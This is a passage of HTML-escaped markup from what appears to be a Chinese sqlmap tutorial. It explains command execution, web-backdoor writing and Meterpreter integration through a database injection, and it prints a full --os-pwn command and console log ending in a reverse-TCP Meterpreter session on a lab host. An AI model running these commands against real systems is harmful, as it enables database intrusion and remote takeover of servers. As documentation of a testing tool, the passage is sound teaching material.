style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u7528<span>&#8211;os-shell<\/span><span>\u53c2\u6570\u4e5f\u53ef\u4ee5\u6a21\u62df\u4e00\u4e2a\u771f\u5b9e\u7684<\/span><span>shell<\/span><span>\uff0c\u53ef\u4ee5\u8f93\u5165\u4f60\u60f3\u6267\u884c\u7684\u547d\u4ee4\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4e0d\u80fd\u6267\u884c\u591a\u8bed\u53e5\u7684\u65f6\u5019\uff08\u6bd4\u5982<span>php<\/span><span>\u6216\u8005<\/span><span>asp<\/span><span>\u7684\u540e\u7aef\u6570\u636e\u5e93\u4e3a<\/span><span>MySQL<\/span><span>\u65f6\uff09\uff0c\u4ecd\u7136\u53ef\u80fd\u4f7f\u7528<\/span><span>INTO&nbsp;OUTFILE<\/span><span>\u5199\u8fdb\u53ef\u5199\u76ee\u5f55\uff0c\u6765\u521b\u5efa\u4e00\u4e2a<\/span><span>web<\/span><span>\u540e\u95e8\u3002\u652f\u6301\u7684\u8bed\u8a00\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001<\/span><span>ASP<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001<\/span><span>ASP.NET<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001<\/span><span>JSP<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">4<span>\u3001<\/span><span>PHP<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Meterpreter%E9%85%8D%E5%90%88%E4%BD%BF%E7%94%A8\"><\/span>\n\t<span 
style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">Meterpreter\u914d\u5408\u4f7f\u7528<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;os-pwn,&#8211;os-smbrelay,&#8211;os-bof,&#8211;priv-esc,&#8211;msf-path,&#8211;tmp-path<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u6570\u636e\u5e93\u4e3a<span>MySQL<\/span><span>\uff0c<\/span><span>PostgreSQL<\/span><span>\u6216<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\uff0c\u53ef\u4ee5\u5728\u6570\u636e\u5e93\u4e0e\u653b\u51fb\u8005\u76f4\u63a5\u5efa\u7acb<\/span><span>TCP<\/span><span>\u8fde\u63a5\uff0c\u8fd9\u4e2a\u8fde\u63a5\u53ef\u4ee5\u662f\u4e00\u4e2a\u4ea4\u4e92\u5f0f\u547d\u4ee4\u884c\u7684<\/span><span>Meterpreter<\/span><span>\u4f1a\u8bdd\uff0c<\/span><span>sqlmap<\/span><span>\u6839\u636e<\/span><span>Metasploit<\/span><span>\u751f\u6210<\/span><span>shellcode<\/span><span>\uff0c\u5e76\u6709\u56db\u79cd\u65b9\u5f0f\u6267\u884c\u5b83\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">1<span>\u3001\u901a\u8fc7\u7528\u6237\u81ea\u5b9a\u4e49\u7684<\/span><span>sys_bineval()<\/span><span>\u51fd\u6570\u5728\u5185\u5b58\u4e2d\u6267\u884c<\/span><span>Metasploit<\/span><span>\u7684<\/span><span>shellcode<\/span><span>\uff0c\u652f\u6301<\/span><span>MySQL<\/span><span>\u548c<\/span><span>PostgreSQL<\/span><span>\u6570\u636e\u5e93\uff0c\u53c2\u6570\uff1a<\/span><span>&#8211;os-pwn<\/span><span>\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001\u901a\u8fc7\u7528\u6237\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\u4e0a\u4f20\u4e00\u4e2a\u72ec\u7acb\u7684<\/span><span>payload<\/span><span>\u6267\u884c\uff0c<\/span><span>MySQL<\/span><span>\u548c<\/span><span>PostgreSQL<\/span><span>\u7684<\/span><span>sys_exec()<\/span><span>\u51fd\u6570\uff0c<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u7684<\/span><span>xp_cmdshell()<\/span><span>\u51fd\u6570\uff0c\u53c2\u6570\uff1a<\/span><span>&#8211;os-pwn<\/span><span>\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001\u901a\u8fc7<\/span><span>SMB<\/span><span>\u653b\u51fb<\/span><span>(MS08-068)<\/span><span>\u6765\u6267\u884c<\/span><span>Metasploit<\/span><span>\u7684<\/span><span>shellcode<\/span><span>\uff0c\u5f53<\/span><span>sqlmap<\/span><span>\u83b7\u53d6\u5230\u7684\u6743\u9650\u8db3\u591f\u9ad8\u7684\u65f6\u5019\uff08<\/span><span>Linux\/Unix<\/span><span>\u7684<\/span><span>uid=0<\/span><span>\uff0c<\/span><span>Windows<\/span><span>\u662f<\/span><span>Administrator<\/span><span>\uff09\uff0c\u53c2\u6570\uff1a<\/span><span>&#8211;os-smbrelay<\/span><span>\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">4<span>\u3001\u901a\u8fc7\u6ea2\u51fa<\/span><span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2000<\/span><span>\u548c<\/span><span>2005<\/span><span>\u7684<\/span><span>sp_replwritetovarbin<\/span><span>\u5b58\u50a8\u8fc7\u7a0b<\/span><span>(MS09-004)<\/span><span>\uff0c\u5728\u5185\u5b58\u4e2d\u6267\u884c<\/span><span>Metasploit<\/span><span>\u7684<\/span><span>payload<\/span><span>\uff0c\u53c2\u6570\uff1a<\/span><span>&#8211;os-bof<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>MySQL<\/span><span>\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.129\/sqlmap\/mysql\/iis\/get_int_55.aspx?id=1&#8221;&nbsp;&#8211;os-pwn&nbsp;&#8211;msf-path&nbsp;\/software\/metasploit<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:31]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;is&nbsp;MySQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;server&nbsp;operating&nbsp;system:&nbsp;Windows&nbsp;2003<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">web&nbsp;application&nbsp;technology:&nbsp;ASP.NET,&nbsp;ASP.NET&nbsp;4.0.30319,&nbsp;Microsoft&nbsp;IIS&nbsp;6.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;MySQL&nbsp;5.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:31]&nbsp;[INFO]&nbsp;fingerprinting&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;operating&nbsp;system<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:31]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;operating&nbsp;system&nbsp;is&nbsp;Windows<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">how&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;establish&nbsp;the&nbsp;tunnel?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;TCP:&nbsp;Metasploit&nbsp;Framework&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;ICMP:&nbsp;icmpsh&nbsp;&#8211;&nbsp;ICMP&nbsp;tunneling<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">[hh:mm:32]&nbsp;[INFO]&nbsp;testing&nbsp;if&nbsp;current&nbsp;user&nbsp;is&nbsp;DBA<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:32]&nbsp;[INFO]&nbsp;fetching&nbsp;current&nbsp;user<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">what&nbsp;is&nbsp;the&nbsp;back-end&nbsp;database&nbsp;management&nbsp;system&nbsp;architecture?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;32-bit&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;64-bit<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:33]&nbsp;[INFO]&nbsp;checking&nbsp;if&nbsp;UDF&nbsp;&#8216;sys_bineval&#8217;&nbsp;already&nbsp;exist<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:33]&nbsp;[INFO]&nbsp;checking&nbsp;if&nbsp;UDF&nbsp;&#8216;sys_exec&#8217;&nbsp;already&nbsp;exist<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:33]&nbsp;[INFO]&nbsp;detecting&nbsp;back-end&nbsp;DBMS&nbsp;version&nbsp;from&nbsp;its&nbsp;banner<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:33]&nbsp;[INFO]&nbsp;retrieving&nbsp;MySQL&nbsp;base&nbsp;directory&nbsp;absolute&nbsp;path<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:34]&nbsp;[INFO]&nbsp;creating&nbsp;UDF&nbsp;&#8216;sys_bineval&#8217;&nbsp;from&nbsp;the&nbsp;binary&nbsp;UDF&nbsp;file<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:34]&nbsp;[INFO]&nbsp;creating&nbsp;UDF&nbsp;&#8216;sys_exec&#8217;&nbsp;from&nbsp;the&nbsp;binary&nbsp;UDF&nbsp;file<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">how&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;execute&nbsp;the&nbsp;Metasploit&nbsp;shellcode&nbsp;on&nbsp;the&nbsp;back-end&nbsp;database&nbsp;underlying&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">operating&nbsp;system?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Via&nbsp;UDF&nbsp;&#8216;sys_bineval&#8217;&nbsp;(in-memory&nbsp;way,&nbsp;anti-forensics,&nbsp;default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;Stand-alone&nbsp;payload&nbsp;stager&nbsp;(file&nbsp;system&nbsp;way)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:35]&nbsp;[INFO]&nbsp;creating&nbsp;Metasploit&nbsp;Framework&nbsp;multi-stage&nbsp;shellcode&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">which&nbsp;connection&nbsp;type&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;use?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Reverse&nbsp;TCP:&nbsp;Connect&nbsp;back&nbsp;from&nbsp;the&nbsp;database&nbsp;host&nbsp;to&nbsp;this&nbsp;machine&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;Reverse&nbsp;TCP:&nbsp;Try&nbsp;to&nbsp;connect&nbsp;back&nbsp;from&nbsp;the&nbsp;database&nbsp;host&nbsp;to&nbsp;this&nbsp;machine,&nbsp;on&nbsp;all&nbsp;ports&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">between&nbsp;the&nbsp;specified&nbsp;and&nbsp;65535<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3]&nbsp;Bind&nbsp;TCP:&nbsp;Listen&nbsp;on&nbsp;the&nbsp;database&nbsp;host&nbsp;for&nbsp;a&nbsp;connection<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">which&nbsp;is&nbsp;the&nbsp;local&nbsp;address?&nbsp;[192.168.136.1]&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">which&nbsp;local&nbsp;port&nbsp;number&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;use?&nbsp;[60641]&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">which&nbsp;payload&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;use?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Meterpreter&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;Shell<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3]&nbsp;VNC<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:40]&nbsp;[INFO]&nbsp;creation&nbsp;in&nbsp;progress&nbsp;&#8230;&nbsp;done<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:43]&nbsp;[INFO]&nbsp;running&nbsp;Metasploit&nbsp;Framework&nbsp;command&nbsp;line&nbsp;interface&nbsp;locally,&nbsp;please&nbsp;wait..<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;o<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">_&nbsp;&nbsp;_&nbsp;&nbsp;_&nbsp;&nbsp;&nbsp;&nbsp;_&nbsp;_|_&nbsp;&nbsp;__,&nbsp;&nbsp;&nbsp;,&nbsp;&nbsp;&nbsp;&nbsp;_&nbsp;&nbsp;|&nbsp;|&nbsp;&nbsp;__&nbsp;&nbsp;&nbsp;&nbsp;_|_<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">\/&nbsp;|\/&nbsp;|\/&nbsp;|&nbsp;&nbsp;|\/&nbsp;&nbsp;|&nbsp;&nbsp;\/&nbsp;&nbsp;|&nbsp;&nbsp;\/&nbsp;\\_|\/&nbsp;\\_|\/&nbsp;&nbsp;\/&nbsp;&nbsp;\\_|&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;&nbsp;|&nbsp;&nbsp;|_\/|__\/|_\/\\_\/|_\/&nbsp;\\\/&nbsp;|__\/&nbsp;|__\/\\__\/&nbsp;|_\/|_\/<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\/|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\\|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;=[&nbsp;metasploit&nbsp;v3.7.0-dev&nbsp;[core:3.7&nbsp;api:1.0]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&nbsp;&#8212;&nbsp;&#8211;=[&nbsp;674&nbsp;exploits&nbsp;&#8211;&nbsp;351&nbsp;auxiliary<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&nbsp;&#8212;&nbsp;&#8211;=[&nbsp;217&nbsp;payloads&nbsp;&#8211;&nbsp;27&nbsp;encoders&nbsp;&#8211;&nbsp;8&nbsp;nops<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;=[&nbsp;svn&nbsp;r12272&nbsp;updated&nbsp;4&nbsp;days&nbsp;ago&nbsp;(2011.04.07)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">PAYLOAD&nbsp;=&gt;&nbsp;windows\/meterpreter\/reverse_tcp<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">EXITFUNC&nbsp;=&gt;&nbsp;thread<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">LPORT&nbsp;=&gt;&nbsp;60641<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">LHOST&nbsp;=&gt;&nbsp;192.168.136.1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;Started&nbsp;reverse&nbsp;handler&nbsp;on&nbsp;192.168.136.1:60641&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;Starting&nbsp;the&nbsp;payload&nbsp;handler&#8230;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:48]&nbsp;[INFO]&nbsp;running&nbsp;Metasploit&nbsp;Framework&nbsp;shellcode&nbsp;remotely&nbsp;via&nbsp;UDF&nbsp;&#8216;sys_bineval&#8217;,&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">please&nbsp;wait..<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;Sending&nbsp;stage&nbsp;(749056&nbsp;bytes)&nbsp;to&nbsp;192.168.136.129<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span 
class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;Meterpreter&nbsp;session&nbsp;1&nbsp;opened&nbsp;(192.168.136.1:60641&nbsp;-&gt;&nbsp;192.168.136.129:1689)&nbsp;at&nbsp;Mon&nbsp;Apr&nbsp;11&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">hh:mm:52&nbsp;+0100&nbsp;2011<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;Loading&nbsp;extension&nbsp;espia&#8230;success.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;Loading&nbsp;extension&nbsp;incognito&#8230;success.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;[-]&nbsp;The&nbsp;&#8216;priv&#8217;&nbsp;extension&nbsp;has&nbsp;already&nbsp;been&nbsp;loaded.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;Loading&nbsp;extension&nbsp;sniffer&#8230;success.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;System&nbsp;Language&nbsp;:&nbsp;en_US<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
